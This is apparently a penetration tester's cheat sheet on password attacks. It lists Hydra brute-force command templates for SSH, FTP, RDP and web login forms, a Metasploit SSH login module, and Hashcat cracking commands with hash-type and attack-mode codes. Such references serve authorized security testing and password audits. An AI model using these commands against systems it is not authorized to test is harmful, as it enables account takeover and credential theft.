Skip to content

Password Attacks

Password Guessing - Hydra

# SSH/FTP/RDP Brute Force
hydra -l <username> -P <password list> -t <thread count> <ssh|ftp|rdp>://<ip address>

# Post Request Login Form
hydra -l <username> -P <password list> -f -V <website> http-post-form "/<URI>:user=^USER^&password=^PASS^:<error text>"

Password Guessing - Metasploit

# SSH Brute Force Module (Accepts, User, Pass, and User:Pass)
use auxiliary/scanner/ssh/ssh_login

Password Cracking - Hashcat

# Basic Wordlist attack
hashcat -m 1000 -a 0 ntlm_hashes.txt rockyou.txt

# Combination Attack
hashcat -m 1000 -a 1 hashes.txt left_wordlist.txt right_wordlist.txt

# Brute Force (up to 8 characters)
hashcat -m 1000 -a 3 ntlm_hashes.txt ?a?a?a?a?a?a?a?a

# Wordlist followed by year
hashcat -m 1000 -a 6 hashes.txt names.txt 202?d

# 4 digits followed by wordlist
hashcat -m 1000 -a 7 hashes.txt ?d?d?d?d rockyou.txt

# MD5 Wordlist with Rules
hashcat -m 0 -a 0 md5_hashes.txt rockyou.txt -r best64.rule

# Common Password Types
0 = MD5
1000 = NTLM
5600 - NTLMv2
13100 - Kerberos 5 TGS-REP

# Attack Types
0 = Dictionary
1 = Combination
3 = Brute Force
6 = Wordlist + Mask
7 = Mask + Wordlist